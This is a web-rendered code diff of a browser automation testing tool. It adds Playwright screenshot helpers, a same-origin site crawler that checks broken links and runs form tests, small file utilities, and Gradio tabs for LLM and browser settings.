            with open(filepath, 'w', encoding='utf-8') as f:
                json.dump(metadata, f, indent=2)

            logger.info(f"Screenshots metadata saved to: {filepath}")

        except Exception as e:
            logger.error(f"Error saving screenshots metadata: {str(e)}")
|
| 244 |
+
|
| 245 |
+
|
| 246 |
+
# Global screenshot capture instance shared by the module-level convenience
# helpers below; writes PNGs under the default "screenshots" directory.
screenshot_capture = ScreenshotCapture()
|
| 248 |
+
|
| 249 |
+
|
| 250 |
+
async def capture_test_screenshot(
    page: Page,
    test_name: str,
    step_description: str = "Test Step"
) -> Dict[str, Any]:
    """Capture a page screenshot labelled "<test_name> - <step_description>".

    Thin wrapper over the module-level ``screenshot_capture`` singleton.

    Args:
        page: Playwright page object.
        test_name: Name of the test.
        step_description: Description of the test step.

    Returns:
        Dictionary containing screenshot metadata.
    """
    label = f"{test_name} - {step_description}"
    return await screenshot_capture.capture_screenshot(page, label)
|
| 268 |
+
|
| 269 |
+
|
| 270 |
+
async def capture_error_screenshot(
    page: Page,
    test_name: str,
    error_message: str
) -> Dict[str, Any]:
    """Capture a failure screenshot labelled "<test_name> - Error".

    Delegates to the module-level ``screenshot_capture`` singleton's
    ``capture_error_screenshot`` method (which this function's name shadows
    at module scope).

    Args:
        page: Playwright page object.
        test_name: Name of the test.
        error_message: The error message.

    Returns:
        Dictionary containing screenshot metadata.
    """
    label = f"{test_name} - Error"
    return await screenshot_capture.capture_error_screenshot(page, error_message, label)
|
src/utils/site_audit.py
ADDED
|
@@ -0,0 +1,144 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Site Audit
|
| 3 |
+
======================================================
|
| 4 |
+
|
| 5 |
+
Site-wide intelligent audit: crawl pages, detect broken links, collect console/network errors,
|
| 6 |
+
run form tests where applicable, and generate an aggregated report.
|
| 7 |
+
"""
|
| 8 |
+
|
| 9 |
+
import asyncio
|
| 10 |
+
import logging
|
| 11 |
+
from typing import Any, Dict, List, Set, Tuple
|
| 12 |
+
from urllib.parse import urljoin, urlparse
|
| 13 |
+
|
| 14 |
+
from playwright.async_api import Page
|
| 15 |
+
|
| 16 |
+
from src.utils.intelligent_form_testing import IntelligentFormTester
|
| 17 |
+
|
| 18 |
+
logger = logging.getLogger(__name__)
|
| 19 |
+
|
| 20 |
+
|
| 21 |
+
class SiteAuditor:
    """Breadth-first site auditor.

    Starting from a URL, crawls same-origin pages up to configurable limits,
    collecting per-page diagnostics (title, visible error text, broken links)
    and running intelligent form testing on pages that contain forms.
    """

    def __init__(self, page: "Page", form_tester_factory):
        """page: a Playwright Page bound to a BrowserContext
        form_tester_factory: callable that returns IntelligentFormTester for a given page
        """
        self.page = page
        self.form_tester_factory = form_tester_factory

    async def audit(self, start_url: str, max_pages: int = 10, max_depth: int = 2) -> Dict[str, Any]:
        """Crawl the site breadth-first and return an aggregated audit report.

        Args:
            start_url: URL the crawl starts from; its origin defines "same-origin".
            max_pages: hard cap on the number of pages visited.
            max_depth: maximum link depth relative to start_url.

        Returns:
            Dict with keys "start_url", "total_pages_visited", "pages"
            (per-page summaries) and "broken_links".
        """
        visited: Set[str] = set()
        # Track every URL ever enqueued so the same link found on many pages
        # is not appended to the queue repeatedly.
        queued: Set[str] = {start_url}
        queue: List[Tuple[str, int]] = [(start_url, 0)]

        origin = self._origin(start_url)

        pages_summary: List[Dict[str, Any]] = []
        broken_links: List[Dict[str, str]] = []

        while queue and len(visited) < max_pages:
            url, depth = queue.pop(0)
            if url in visited or depth > max_depth:
                continue
            visited.add(url)

            try:
                await self.page.goto(url, wait_until='domcontentloaded')
                await asyncio.sleep(0.5)  # small grace period for late-rendering content

                page_result: Dict[str, Any] = {
                    "url": url,
                    "title": await self.page.title(),
                    "console_errors": await self._collect_console_errors(),
                    "network_issues": [],
                }

                # Basic broken link scan on current page.
                # NOTE: despite the helper's name, lightweight GET requests are
                # issued (see _head_status for why).
                links = await self._extract_links()
                same_origin_links = [l for l in links if self._origin(l) == origin]

                # Check a subset to keep runtime in bounds
                for link in same_origin_links[:50]:
                    status = await self._head_status(link)
                    if status >= 400:
                        broken_links.append({"href": link, "status": str(status), "on_page": url})

                # Run intelligent form testing if forms exist
                if (await self.page.locator("form").count()) > 0:
                    tester = self.form_tester_factory(self.page)
                    try:
                        await tester.discover_form_fields()
                        scenarios = await tester.generate_test_scenarios()
                        await tester.execute_test_scenarios(scenarios)
                        page_result["form_testing"] = await tester.generate_comprehensive_report()

                        # Add basic accessibility checks for the page
                        page_result["accessibility"] = await tester.run_basic_accessibility_checks()
                    except Exception as e:
                        # Form-testing failures must not abort the crawl.
                        page_result["form_testing_error"] = str(e)

                pages_summary.append(page_result)

                # Enqueue next links (each URL at most once per crawl).
                for link in same_origin_links:
                    if link not in visited and link not in queued:
                        queued.add(link)
                        queue.append((link, depth + 1))

            except Exception as e:
                logger.warning(f"Audit navigation error at {url}: {e}")
                pages_summary.append({"url": url, "error": str(e)})

        return {
            "start_url": start_url,
            "total_pages_visited": len(visited),
            "pages": pages_summary,
            "broken_links": broken_links,
        }

    async def _extract_links(self) -> List[str]:
        """Collect absolute URLs from up to 200 anchor elements on the current page."""
        anchors = await self.page.locator("a[href]").all()
        urls: List[str] = []
        base = self.page.url
        for a in anchors[:200]:
            try:
                href = await a.get_attribute("href")
                if href:
                    urls.append(urljoin(base, href))
            except Exception:
                # Detached or stale elements are simply skipped.
                continue
        return urls

    async def _head_status(self, url: str) -> int:
        """Return the HTTP status code for ``url``, or 599 if the request fails.

        Uses context.request for a lightweight request. A GET (not HEAD) is
        issued because some servers reject or misreport HEAD.
        """
        try:
            resp = await self.page.context.request.get(url, max_redirects=2)
            return resp.status
        except Exception:
            # 599 is a sentinel "network/connect failure" code (non-standard).
            return 599

    async def _collect_console_errors(self) -> List[str]:
        """Snapshot error-looking text currently rendered in the DOM.

        Heuristic: elements with common error classes or role='alert'. This
        does NOT capture actual browser console output.
        """
        errors: List[str] = []
        try:
            loc = self.page.locator(".error, .alert-danger, [role='alert']").all()
            for l in await loc:
                try:
                    txt = await l.text_content()
                    if txt:
                        errors.append(txt.strip())
                except Exception:
                    continue
        except Exception:
            pass
        return errors

    def _origin(self, url: str) -> str:
        """Return 'scheme://netloc' for ``url`` (used for same-origin filtering)."""
        u = urlparse(url)
        return f"{u.scheme}://{u.netloc}"
|
| 143 |
+
|
| 144 |
+
|
src/utils/utils.py
ADDED
|
@@ -0,0 +1,50 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Utilities
|
| 3 |
+
=====================================================
|
| 4 |
+
|
| 5 |
+
Utility functions and helpers for the Fagun Browser Automation Testing Agent.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import base64
|
| 13 |
+
import os
|
| 14 |
+
import time
|
| 15 |
+
from pathlib import Path
|
| 16 |
+
from typing import Dict, Optional
|
| 17 |
+
import requests
|
| 18 |
+
import json
|
| 19 |
+
import gradio as gr
|
| 20 |
+
import uuid
|
| 21 |
+
|
| 22 |
+
|
| 23 |
+
def encode_image(img_path):
    """Return the base64-encoded contents of an image file as a UTF-8 string.

    Returns None when no path is supplied.
    """
    if not img_path:
        return None
    with open(img_path, "rb") as handle:
        raw = handle.read()
    return base64.b64encode(raw).decode("utf-8")
|
| 29 |
+
|
| 30 |
+
|
| 31 |
+
def get_latest_files(directory: str, file_types=('.webm', '.zip')) -> Dict[str, Optional[str]]:
    """Get the latest recording and trace files.

    Recursively searches ``directory`` for the newest file of each extension
    in ``file_types`` and returns a mapping of extension -> absolute-ish path
    (or None when no complete file exists). The directory is created if it
    does not exist yet.

    Note: the default is a tuple rather than a list to avoid the shared
    mutable-default-argument pitfall; callers may still pass a list.
    """
    latest_files: Dict[str, Optional[str]] = {ext: None for ext in file_types}

    if not os.path.exists(directory):
        os.makedirs(directory, exist_ok=True)
        return latest_files

    for file_type in file_types:
        try:
            matches = list(Path(directory).rglob(f"*{file_type}"))
            if matches:
                latest = max(matches, key=lambda p: p.stat().st_mtime)
                # Only return files that are complete (not being written):
                # anything modified within the last second is assumed in-flight.
                if time.time() - latest.stat().st_mtime > 1.0:
                    latest_files[file_type] = str(latest)
        except Exception as e:
            print(f"Error getting latest {file_type} file: {e}")

    return latest_files
|
src/webui/__init__.py
ADDED
|
File without changes
|
src/webui/components/__init__.py
ADDED
|
File without changes
|
src/webui/components/agent_settings_tab.py
ADDED
|
@@ -0,0 +1,241 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Agent Settings Tab
|
| 3 |
+
==============================================================
|
| 4 |
+
|
| 5 |
+
UI components for agent configuration and settings.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import json
|
| 13 |
+
import os
|
| 14 |
+
|
| 15 |
+
import gradio as gr
|
| 16 |
+
from gradio.components import Component
|
| 17 |
+
from typing import Any, Dict, Optional
|
| 18 |
+
from src.webui.webui_manager import WebuiManager
|
| 19 |
+
from src.utils import config
|
| 20 |
+
import logging
|
| 21 |
+
from functools import partial
|
| 22 |
+
|
| 23 |
+
logger = logging.getLogger(__name__)
|
| 24 |
+
|
| 25 |
+
|
| 26 |
+
def update_model_dropdown(llm_provider):
    """Refresh the model-name dropdown to match the selected provider.

    Providers with a predefined model list get those choices with the first
    model preselected; unknown providers yield an empty free-text dropdown.
    """
    if llm_provider in config.model_names:
        models = config.model_names[llm_provider]
        return gr.Dropdown(choices=models, value=models[0], interactive=True)
    return gr.Dropdown(choices=[], value="", interactive=True, allow_custom_value=True)
|
| 36 |
+
|
| 37 |
+
|
| 38 |
+
|
| 39 |
+
|
| 40 |
+
def create_agent_settings_tab(webui_manager: WebuiManager):
    """
    Creates an agent settings tab.

    Builds the LLM / planner-LLM / run-limit widgets, registers them with the
    WebuiManager under the "agent_settings" group, and wires the provider
    dropdowns to refresh their model lists.
    """
    # NOTE(review): input_components is never used below — presumably a
    # leftover snapshot of pre-existing components; confirm before removing.
    input_components = set(webui_manager.get_components())
    tab_components = {}

    # --- Main LLM configuration ---
    with gr.Group():
        with gr.Row():
            llm_provider = gr.Dropdown(
                choices=[provider for provider, model in config.model_names.items()],
                label="🤖 AI Service Provider",
                value=os.getenv("DEFAULT_LLM", "openai"),
                info="Choose which AI company's service to use (OpenAI, Google, etc.)",
                interactive=True
            )
            llm_model_name = gr.Dropdown(
                label="🧠 AI Model",
                choices=config.model_names[os.getenv("DEFAULT_LLM", "openai")],
                value=config.model_names[os.getenv("DEFAULT_LLM", "openai")][0],
                interactive=True,
                allow_custom_value=True,
                info="Pick the specific AI model to use (like GPT-4, Claude, etc.)"
            )
        with gr.Row():
            llm_temperature = gr.Slider(
                minimum=0.0,
                maximum=2.0,
                value=0.6,
                step=0.1,
                label="🎲 AI Creativity Level",
                info="Lower = More predictable, Higher = More creative responses",
                interactive=True
            )

            use_vision = gr.Checkbox(
                label="👁️ Enable Visual Analysis",
                value=True,
                info="Let AI see and analyze screenshots of websites",
                interactive=True
            )

            # Hidden unless the "ollama" provider is selected (see .change below).
            ollama_num_ctx = gr.Slider(
                minimum=2 ** 8,
                maximum=2 ** 16,
                value=16000,
                step=1,
                label="📝 Memory Size (Ollama only)",
                info="How much information AI can remember at once (higher = slower but smarter)",
                visible=False,
                interactive=True
            )

        with gr.Row():
            llm_base_url = gr.Textbox(
                label="🌐 Custom API URL",
                value="",
                info="Only needed if using a custom AI service (leave blank for standard services)"
            )
            llm_api_key = gr.Textbox(
                label="🔑 Your API Key",
                type="password",
                value="",
                info="Get this from your AI service provider (OpenAI, Google, etc.)"
            )

    # --- Optional planner LLM (separate model for task planning) ---
    with gr.Group():
        with gr.Row():
            planner_llm_provider = gr.Dropdown(
                choices=[provider for provider, model in config.model_names.items()],
                label="🎯 Planning AI Service",
                info="Optional: Different AI for planning complex tasks",
                value=None,
                interactive=True
            )
            planner_llm_model_name = gr.Dropdown(
                label="🧠 Planning AI Model",
                interactive=True,
                allow_custom_value=True,
                info="AI model for planning and organizing tasks"
            )
        with gr.Row():
            planner_llm_temperature = gr.Slider(
                minimum=0.0,
                maximum=2.0,
                value=0.6,
                step=0.1,
                label="🎲 Planning AI Creativity",
                info="How creative the planning AI should be",
                interactive=True
            )

            planner_use_vision = gr.Checkbox(
                label="👁️ Enable Visual Planning",
                value=False,
                info="Let planning AI see website screenshots",
                interactive=True
            )

            # Mirrors ollama_num_ctx: only shown for the "ollama" planner provider.
            planner_ollama_num_ctx = gr.Slider(
                minimum=2 ** 8,
                maximum=2 ** 16,
                value=16000,
                step=1,
                label="📝 Planning Memory Size",
                info="How much information planning AI can remember (Ollama only)",
                visible=False,
                interactive=True
            )

        with gr.Row():
            planner_llm_base_url = gr.Textbox(
                label="🌐 Planning API URL",
                value="",
                info="Custom URL for planning AI service (leave blank for standard)"
            )
            planner_llm_api_key = gr.Textbox(
                label="🔑 Planning API Key",
                type="password",
                value="",
                info="API key for planning AI service"
            )

    # --- Run limits ---
    with gr.Row():
        max_steps = gr.Slider(
            minimum=1,
            maximum=1000,
            value=100,
            step=1,
            label="🔄 Maximum Testing Steps",
            info="How many steps AI can take to complete a task",
            interactive=True
        )
        max_actions = gr.Slider(
            minimum=1,
            maximum=100,
            value=10,
            step=1,
            label="⚡ Actions Per Step",
            info="How many actions AI can do in each step",
            interactive=True
        )

    with gr.Row():
        max_input_tokens = gr.Number(
            label="📄 Maximum Text Input",
            value=128000,
            precision=0,
            interactive=True
        )
        tool_calling_method = gr.Dropdown(
            label="🛠️ AI Communication Method",
            value="auto",
            interactive=True,
            allow_custom_value=True,
            choices=['function_calling', 'json_mode', 'raw', 'auto', 'tools', "None"],
            visible=True
        )
    # Register everything under the "agent_settings" group so other tabs can
    # look these components up by name.
    tab_components.update(dict(
        llm_provider=llm_provider,
        llm_model_name=llm_model_name,
        llm_temperature=llm_temperature,
        use_vision=use_vision,
        ollama_num_ctx=ollama_num_ctx,
        llm_base_url=llm_base_url,
        llm_api_key=llm_api_key,
        planner_llm_provider=planner_llm_provider,
        planner_llm_model_name=planner_llm_model_name,
        planner_llm_temperature=planner_llm_temperature,
        planner_use_vision=planner_use_vision,
        planner_ollama_num_ctx=planner_ollama_num_ctx,
        planner_llm_base_url=planner_llm_base_url,
        planner_llm_api_key=planner_llm_api_key,
        max_steps=max_steps,
        max_actions=max_actions,
        max_input_tokens=max_input_tokens,
        tool_calling_method=tool_calling_method,
    ))
    webui_manager.add_components("agent_settings", tab_components)

    # Show the Ollama context-size slider only for the "ollama" provider.
    llm_provider.change(
        fn=lambda x: gr.update(visible=x == "ollama"),
        inputs=llm_provider,
        outputs=ollama_num_ctx
    )
    # Refresh the model list whenever the provider changes.
    llm_provider.change(
        lambda provider: update_model_dropdown(provider),
        inputs=[llm_provider],
        outputs=[llm_model_name]
    )
    planner_llm_provider.change(
        fn=lambda x: gr.update(visible=x == "ollama"),
        inputs=[planner_llm_provider],
        outputs=[planner_ollama_num_ctx]
    )
    planner_llm_provider.change(
        lambda provider: update_model_dropdown(provider),
        inputs=[planner_llm_provider],
        outputs=[planner_llm_model_name]
    )
|
| 241 |
+
|
src/webui/components/browser_settings_tab.py
ADDED
|
@@ -0,0 +1,181 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Browser Settings Tab
|
| 3 |
+
===============================================================
|
| 4 |
+
|
| 5 |
+
UI components for browser configuration and settings.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import os
|
| 13 |
+
import gradio as gr
|
| 14 |
+
|
| 15 |
+
def strtobool(val):
    """Convert a string representation of truth to true (1) or false (0)."""
    lowered = val.lower()
    if lowered in {'y', 'yes', 't', 'true', 'on', '1'}:
        return 1
    if lowered in {'n', 'no', 'f', 'false', 'off', '0'}:
        return 0
    raise ValueError("invalid truth value %r" % (lowered,))
|
| 24 |
+
import logging
|
| 25 |
+
from gradio.components import Component
|
| 26 |
+
|
| 27 |
+
from src.webui.webui_manager import WebuiManager
|
| 28 |
+
from src.utils import config
|
| 29 |
+
|
| 30 |
+
logger = logging.getLogger(__name__)
|
| 31 |
+
|
| 32 |
+
async def close_browser(webui_manager: WebuiManager):
    """
    Close browser

    Cancels any still-running agent task first, then tears down the browser
    context and finally the browser itself, clearing each reference on the
    manager so a fresh instance is created on the next run.
    """
    # Cancel the in-flight agent task before closing the browser it drives.
    if webui_manager.bu_current_task and not webui_manager.bu_current_task.done():
        webui_manager.bu_current_task.cancel()
        webui_manager.bu_current_task = None

    # Context must be closed before the browser that owns it.
    if webui_manager.bu_browser_context:
        logger.info("⚠️ Closing browser context when changing browser config.")
        await webui_manager.bu_browser_context.close()
        webui_manager.bu_browser_context = None

    if webui_manager.bu_browser:
        logger.info("⚠️ Closing browser when changing browser config.")
        await webui_manager.bu_browser.close()
        webui_manager.bu_browser = None
|
| 49 |
+
|
| 50 |
+
def create_browser_settings_tab(webui_manager: WebuiManager):
    """
    Creates a browser settings tab.

    Builds the browser binary/connection/recording widgets, registers them
    under the "browser_settings" group, and closes any live browser whenever
    a setting that requires a relaunch changes.
    """
    # NOTE(review): input_components is never used below — presumably a
    # leftover snapshot of pre-existing components; confirm before removing.
    input_components = set(webui_manager.get_components())
    tab_components = {}

    # --- Local browser binary / profile ---
    with gr.Group():
        with gr.Row():
            browser_binary_path = gr.Textbox(
                label="Browser Binary Path",
                lines=1,
                interactive=True,
                placeholder="e.g. '/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome'"
            )
            browser_user_data_dir = gr.Textbox(
                label="Browser User Data Dir",
                lines=1,
                interactive=True,
                placeholder="Leave it empty if you use your default user data",
            )
    # --- Launch behavior flags (env-seeded via strtobool) ---
    with gr.Group():
        with gr.Row():
            use_own_browser = gr.Checkbox(
                label="Use Own Browser",
                value=bool(strtobool(os.getenv("USE_OWN_BROWSER", "false"))),
                info="Use your existing browser instance",
                interactive=True
            )
            keep_browser_open = gr.Checkbox(
                label="Keep Browser Open",
                value=bool(strtobool(os.getenv("KEEP_BROWSER_OPEN", "true"))),
                info="Keep Browser Open between Tasks",
                interactive=True
            )
            headless = gr.Checkbox(
                label="Headless Mode",
                value=False,
                info="Run browser without GUI",
                interactive=True
            )
            disable_security = gr.Checkbox(
                label="Disable Security",
                value=False,
                info="Disable browser security",
                interactive=True
            )

    # --- Window geometry ---
    with gr.Group():
        with gr.Row():
            window_w = gr.Number(
                label="Window Width",
                value=1280,
                info="Browser window width",
                interactive=True
            )
            window_h = gr.Number(
                label="Window Height",
                value=1100,
                info="Browser window height",
                interactive=True
            )
    # --- Remote-debugging endpoints ---
    with gr.Group():
        with gr.Row():
            cdp_url = gr.Textbox(
                label="CDP URL",
                value=os.getenv("BROWSER_CDP", None),
                info="CDP URL for browser remote debugging",
                interactive=True,
            )
            wss_url = gr.Textbox(
                label="WSS URL",
                info="WSS URL for browser remote debugging",
                interactive=True,
            )
    # --- Output/artifact paths ---
    with gr.Group():
        with gr.Row():
            save_recording_path = gr.Textbox(
                label="Recording Path",
                placeholder="e.g. ./tmp/record_videos",
                info="Path to save browser recordings",
                interactive=True,
            )

            save_trace_path = gr.Textbox(
                label="Trace Path",
                placeholder="e.g. ./tmp/traces",
                info="Path to save Agent traces",
                interactive=True,
            )

        with gr.Row():
            save_agent_history_path = gr.Textbox(
                label="Agent History Save Path",
                value="./tmp/agent_history",
                info="Specify the directory where agent history should be saved.",
                interactive=True,
            )
            save_download_path = gr.Textbox(
                label="Save Directory for browser downloads",
                value="./tmp/downloads",
                info="Specify the directory where downloaded files should be saved.",
                interactive=True,
            )
    # Register everything under the "browser_settings" group for lookup by name.
    tab_components.update(
        dict(
            browser_binary_path=browser_binary_path,
            browser_user_data_dir=browser_user_data_dir,
            use_own_browser=use_own_browser,
            keep_browser_open=keep_browser_open,
            headless=headless,
            disable_security=disable_security,
            save_recording_path=save_recording_path,
            save_trace_path=save_trace_path,
            save_agent_history_path=save_agent_history_path,
            save_download_path=save_download_path,
            cdp_url=cdp_url,
            wss_url=wss_url,
            window_h=window_h,
            window_w=window_w,
        )
    )
    webui_manager.add_components("browser_settings", tab_components)

    async def close_wrapper():
        """Wrapper for handle_clear."""
        await close_browser(webui_manager)

    # Settings that require a browser relaunch: close the current instance
    # whenever one of them changes so the next task uses the new config.
    headless.change(close_wrapper)
    keep_browser_open.change(close_wrapper)
    disable_security.change(close_wrapper)
    use_own_browser.change(close_wrapper)
|
src/webui/components/browser_use_agent_tab.py
ADDED
|
@@ -0,0 +1,1299 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
